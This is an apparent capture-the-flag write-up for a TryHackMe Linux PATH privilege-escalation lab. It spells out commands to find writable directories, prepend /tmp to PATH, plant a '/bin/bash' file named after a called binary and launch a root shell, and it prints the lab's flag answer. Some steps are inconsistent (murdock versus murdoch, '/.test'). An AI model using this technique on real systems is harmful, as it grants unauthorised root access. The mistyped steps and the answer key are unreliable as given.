TryHackMe - Linux Privilege Escalation: PATH

TryHackMe - Linux Privilege Escalation: PATH

This article discusses the solution for TryHackMe's Linux Privilege Escalation PATH task so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation PATH

Notes:

  • exploiting path folders which we have write access to.

  • see if you have write access to PATH so you can add folders where you have write access to.

    • binaries run in path are usually run under root privileges.

    • copy binary in the folder indicated in path then run a binary containing "/bin/bash" to create a root enabled shell.

What is the odd folder you have write access for?

  1. Run the following command to find write acccess for your user.
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u

Running it doesn't provide the answer we need let's go 1 level deeper:

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Screenshot 2024-02-09 at 8 08 11 PM

Answer: home/murdock

What is the content of the flag6.txt file?

  1. First run the following to see the path:
echo $PATH

Screenshot 2024-02-09 at 9 22 52 PM

  1. Let's see if we have any write permissions in any of the $PATH directories.
find / -writable  2>/dev/null | cut -d "/" -f 2,3,4 | grep usr | sort -u

Screenshot 2024-02-09 at 9 45 36 PM

  1. Unfortunately the writable usr/lib/systemd is not included in the path.

  2. We will append /tmp in the PATH by running the following command:

export PATH=/tmp:$PATH
  1. Execute the following command:
cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
  1. Execute the following which will grant you a root access bash terminal
cd /home/murdoch/
/.test
  1. Execute cat /home/matt/flag6.txt

    Screenshot 2024-02-09 at 11 13 47 PM

Answer: THM-736628929

Until next time. Keep learning.

Stay stoked and code. :)


I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)